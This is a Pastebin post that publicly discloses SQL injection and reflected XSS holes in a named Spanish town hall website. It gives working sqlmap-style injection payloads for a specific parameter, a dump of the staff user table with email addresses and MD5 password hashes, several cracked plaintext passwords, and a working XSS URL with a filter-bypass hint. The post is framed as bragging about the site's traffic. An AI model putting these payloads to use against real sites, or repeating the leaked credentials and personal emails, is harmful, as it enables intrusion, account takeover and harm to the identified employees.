API tools faq
paste
imwoodythecowboy

XSS and SQLi vulnerable site ;)

imwoodythecowboy
Dec 12th, 2015
991
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.82 KB | None | 0 0
raw download clone embed print report
  1. ___ __ ________ ________ ________ ___ ___
  2. |\ \ |\ \|\ __ \|\ __ \|\ ___ \ |\ \ / /|
  3. \ \ \ \ \ \ \ \|\ \ \ \|\ \ \ \_|\ \ \ \ \/ / /
  4. \ \ \ __\ \ \ \ \\\ \ \ \\\ \ \ \ \\ \ \ \ / /
  5. \ \ \|\__\_\ \ \ \\\ \ \ \\\ \ \ \_\\ \ \/ / /
  6. \ \____________\ \_______\ \_______\ \_______\__/ / /
  7. \|____________|\|_______|\|_______|\|_______|\___/ /
  8. \|___|/
  9.  
  10. _________ ___ ___ _______
  11. |\___ ___\\ \|\ \|\ ___ \
  12. \|___ \ \_\ \ \\\ \ \ __/|
  13. \ \ \ \ \ __ \ \ \_|/__
  14. \ \ \ \ \ \ \ \ \ \_|\ \
  15. \ \__\ \ \__\ \__\ \_______\
  16. \|__| \|__|\|__|\|_______|
  17.  
  18.  
  19.  
  20. ________ ________ ___ __ ________ ________ ___ ___
  21. |\ ____\|\ __ \|\ \ |\ \|\ __ \|\ __ \ |\ \ / /|
  22. \ \ \___|\ \ \|\ \ \ \ \ \ \ \ \|\ /\ \ \|\ \ \ \ \/ / /
  23. \ \ \ \ \ \\\ \ \ \ __\ \ \ \ __ \ \ \\\ \ \ \ / /
  24. \ \ \____\ \ \\\ \ \ \|\__\_\ \ \ \|\ \ \ \\\ \ \/ / /
  25. \ \_______\ \_______\ \____________\ \_______\ \_______\__/ / /
  26. \|_______|\|_______|\|____________|\|_______|\|_______|\___/ /
  27. \|___|/
  28.  
  29.  
  30.  
  31. ███████╗ ██████╗ ██╗ ██╗
  32. ██╔════╝██╔═══██╗██║ ██║
  33. ███████╗██║ ██║██║ ██║
  34. ╚════██║██║▄▄ ██║██║ ██║
  35. ███████║╚██████╔╝███████╗██║
  36. ╚══════╝ ╚══▀▀═╝ ╚══════╝╚═╝
  37.  
  38.  
  39.  
  40. sanjavier.es/contenidos.php?id=25
  41.  
  42. ---
  43. Parameter: id (GET)
  44. Type: boolean-based blind
  45. Title: AND boolean-based blind - WHERE or HAVING clause
  46. Payload: id=25 AND 3543=3543
  47.  
  48. Type: error-based
  49. Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
  50. Payload: id=25 AND (SELECT 4629 FROM(SELECT COUNT(*),CONCAT(0x7176766b71,(SELECT (ELT(4629=4629,1))),0x716a626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  51.  
  52. Type: AND/OR time-based blind
  53. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  54. Payload: id=25 AND (SELECT * FROM (SELECT(SLEEP(5)))yEFx)
  55.  
  56. Type: UNION query
  57. Title: Generic UNION query (NULL) - 5 columns
  58. Payload: id=-2136 UNION ALL SELECT NULL,NULL,CONCAT(0x7176766b71,0x42646e456e6c49766d7a,0x716a626271),NULL,NULL--
  59. ---
  60.  
  61. Apache 2, PHP 5.2.17
  62. MySQL is 5.0.12
  63.  
  64. Database names:
  65. information_schema
  66. sanjavier_ayuntamiento
  67.  
  68. Database sanjavier_ayuntamiento
  69. Table ay_usuarios
  70.  
  71. IdUsuario,Admin,Email,Acceso,Perfil,Nombre,Usuario, Password,permisos,Verificado
  72. 0,1,angel.garcia@sanjavier.es,<blank>,<blank>,4f3c42d544a275fbbe64ce4104e871c9,<blank>,admin
  73. 4,1,prensa@sanjavier.es,<blank>,0,<blank>,799ace7324209d94a084c3bcf32c8501,prensa,<blank>,<blank>
  74. 6,1,miguel.rodriguez@sanjavier.es,<blank>,c78d7af1bf85552995f6596c58582234,perfil,<blank>,<blank>
  75. 7,1,activa@sanjavier.com,<blank>,3914b187243c4be61e363ee8ed1acd55,activa,<blank>,<blank>
  76. 33,1,cultura@sanjavier.es,<blank>,3914b187243c4be61e363ee8ed1acd55,centrocivico,<blank>,<blank>
  77. 10,1,medioambiente@sanjavier.es,<blank>,cdeb87babd9c33defb6907faa34589c9,medioambiente,<blank>,<blank>
  78. 11,1,archivo@sanjavier.es,<blank>,0,<blank>,32a53044b28d7c9923cb876a3b5db28b,archivo,<blank>,<blank>
  79. 12,1,maria.lopez@sanjavier.es,<blank>,cce86e0ca56c4200c092cd35cf69fc18,rrhh,<blank>,<blank>
  80. 15,1,salva.tenza@sanjavier.es,<blank>,0b77088167375aa34ec569ae25dcd759,urbanadmin,<blank>,<blank>
  81. 25,1,juventud@sanjavier.es,<blank>,0,<blank>,601b84a424122a764778a296cb11f907,juventud,<blank>,<blank>
  82. 31,1,ana.plazas@sanjavier.es,<blank>,57a1923a408f1f8ccaa7321b6ef6ae34,sanciones,<blank>,<blank>
  83. 16,1,santiago.montealegre@sanjavier.es,<blank>,3914b187243c4be61e363ee8ed1acd55,tiago,<blank>,<blank>
  84. 17,1,proteccion.civil@sanjavier.es,<blank>,3914b187243c4be61e363ee8ed1acd55,112,<blank>,<blank>
  85. 32,1,santiago.montealegre@sanjavier.es,<blank>,3914b187243c4be61e363ee8ed1acd55,emisoramunicipal,<blank>,<blank>
  86. 21,1,concejaliadeturismo@sanjavier.es,<blank>,0e808d2e726bd2ca78d3f218163653f6,turismo,<blank>,<blank>
  87. 34,1,mercedes.gomez@sanjavier.es,<blank>,3914b187243c4be61e363ee8ed1acd55,agricultura,<blank>,<blank>
  88. 49,1,tesoreria@sanjavier.es,<blank>,8275b7c196f519e424636cee91866dea,tesoreria,<blank>,<blank>
  89. 43,1,tablon@sanjavier.es,<blank>,543bf2ef8359c955c0be7f8a757b455f,tablon,<blank>,<blank>
  90. 27,1,ama@sanjavier.es,<blank>,4d505233c2afa4de02e8c0a1c0121b08,urbantecnico,<blank>,<blank>
  91. 28,1,antonio.diaz@sanjavier.es,<blank>,9864663935ceeb7c6e28c615385a6325,biblioteca,<blank>,<blank>
  92. 29,1,salvador.angosto@sanjavier.es,<blank>,da46b283ee9fbc167fac33e57d90f66d,policialocal,<blank>,<blank>
  93. 35,1,anabelen.gomez@sanjavier.es,<blank>,3914b187243c4be61e363ee8ed1acd55,parques,<blank>,<blank>
  94. 36,1,educacion@sanjavier.es,<blank>,71f89a445f4f3eb66a6521d7c08f4b9d,educacion,<blank>,<blank>
  95. 37,1,serviciossociales@sanjavier,<blank>,a8324795085928714b964df95226da17,social,<blank>,<blank>
  96. 38,1,cultura@sanjavier.es,<blank>,3914b187243c4be61e363ee8ed1acd55,cultura,<blank>,<blank>
  97. 39,1,mjs@sanjavier.es,<blank>,3914b187243c4be61e363ee8ed1acd55,contribu,<blank>,<blank>
  98. 40,1,cultura@sanjavier.es,<blank>,3914b187243c4be61e363ee8ed1acd55,festejos,<blank>,<blank>
  99. 44,1,felipe.andres@sanjavier.es,<blank>,78b5ca86114a109120c7138cfa582675,felipe,<blank>,<blank>
  100. 45,1,fernando.postigo@sanjavier.es,<blank>,3914b187243c4be61e363ee8ed1acd55,sanidad,<blank>,<blank>
  101. 46,1,natalia.conesa@sanjavier.es,<blank>,6c9cf82fa18fae794bff644111f8e39f,voluntariado,<blank>,<blank>
  102. 47,1,rosa.samper@sanjavier.es,<blank>,d5868581b5f49c568f17a782c83ac424,secretaria,<blank>,<blank>
  103. 53,1,silvia.alarcon@sanjavier.es,<blank>,2179f960a0a784e6406fc01a92008b5e,patrimonio,<blank>,<blank>
  104. 50,1,astec@astec.com,<blank>,754f562299fab9957e5f40cbb76436a0,recaudaSJ,<blank>,<blank>
  105. 51,1,sac@sanjavier.es,<blank>,119c4b283a992e1dd4be7df8cdcf1dc7,SAC,<blank>,<blank>
  106. 52,1,victor.hernandez@sanjavier.es,57171c81f986cb9530cfeac73a159aa5,victor.hernandez,<blank>,<blank>
  107.  
  108. 4f3c42d544a275fbbe64ce4104e871c9
  109. c78d7af1bf85552995f6596c58582234
  110. 3914b187243c4be61e363ee8ed1acd55
  111. 3914b187243c4be61e363ee8ed1acd55
  112. cdeb87babd9c33defb6907faa34589c9 Mili38
  113. 32a53044b28d7c9923cb876a3b5db28b
  114. cce86e0ca56c4200c092cd35cf69fc18
  115. 0b77088167375aa34ec569ae25dcd759
  116. 601b84a424122a764778a296cb11f907 c.j.2015
  117. 57a1923a408f1f8ccaa7321b6ef6ae34
  118. 3914b187243c4be61e363ee8ed1acd55
  119. 3914b187243c4be61e363ee8ed1acd55
  120. 3914b187243c4be61e363ee8ed1acd55
  121. 0e808d2e726bd2ca78d3f218163653f6
  122. 3914b187243c4be61e363ee8ed1acd55
  123. 8275b7c196f519e424636cee91866dea
  124. 543bf2ef8359c955c0be7f8a757b455f
  125. 4d505233c2afa4de02e8c0a1c0121b08
  126. 9864663935ceeb7c6e28c615385a6325
  127. da46b283ee9fbc167fac33e57d90f66d
  128. 3914b187243c4be61e363ee8ed1acd55
  129. 71f89a445f4f3eb66a6521d7c08f4b9d
  130. a8324795085928714b964df95226da17
  131. 3914b187243c4be61e363ee8ed1acd55
  132. 3914b187243c4be61e363ee8ed1acd55
  133. 3914b187243c4be61e363ee8ed1acd55
  134. 78b5ca86114a109120c7138cfa582675
  135. 3914b187243c4be61e363ee8ed1acd55
  136. 6c9cf82fa18fae794bff644111f8e39f Pedro6
  137. d5868581b5f49c568f17a782c83ac424
  138. 2179f960a0a784e6406fc01a92008b5e
  139. 754f562299fab9957e5f40cbb76436a0
  140. 119c4b283a992e1dd4be7df8cdcf1dc7 Servicio2015*
  141. 57171c81f986cb9530cfeac73a159aa5 Prl2015*
  142.  
  143. ██╗ ██╗███████╗███████╗
  144. ╚██╗██╔╝██╔════╝██╔════╝
  145. ╚███╔╝ ███████╗███████╗
  146. ██╔██╗ ╚════██║╚════██║
  147. ██╔╝ ██╗███████║███████║
  148. ╚═╝ ╚═╝╚══════╝╚══════╝
  149.  
  150. http://sanjavier.es/buscar.php?buscar=%3Cmarquee+behavior%3Dalternate%3ERIP+ASF%3C%2Fmarquee%3E&bs=Buscar
  151. Filters the "" chars and replaces for \", I employed string.fromCharCode
  152. It is non-persistent XSS
  153.  
  154. This site receives an average 500k visits a month btw ;)
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!